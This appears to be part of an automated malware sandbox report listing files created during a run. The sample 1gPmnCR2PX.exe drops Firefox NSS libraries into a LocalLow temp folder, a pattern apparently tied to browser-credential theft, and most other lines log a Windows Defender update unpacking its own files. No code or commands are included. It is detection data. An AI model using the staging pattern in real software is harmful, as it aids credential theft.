Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\mozglue.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\MpAsDesc.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\da-DK\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\el-GR\mpuxagent.dll.mui
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCopyAccelerator.exe
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\softokn3.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ro-RO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-PT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ur-PK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-CA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\lt-LT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\az-Latn-AZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\am-ET\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tr-TR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\ldif60.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\gl-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fr-FR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\el-GR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nb-NO\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ga-IE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\MapiProxy_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ca-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\nssdbm3.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpClient.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nl-NL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ug-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\AccessibleHandler.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\uk-UA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\libEGL.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\eu-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpRtp.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File created: C:\Users\user\AppData\LocalLow\FflibsFder.tmp\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\he-IL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\x86\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
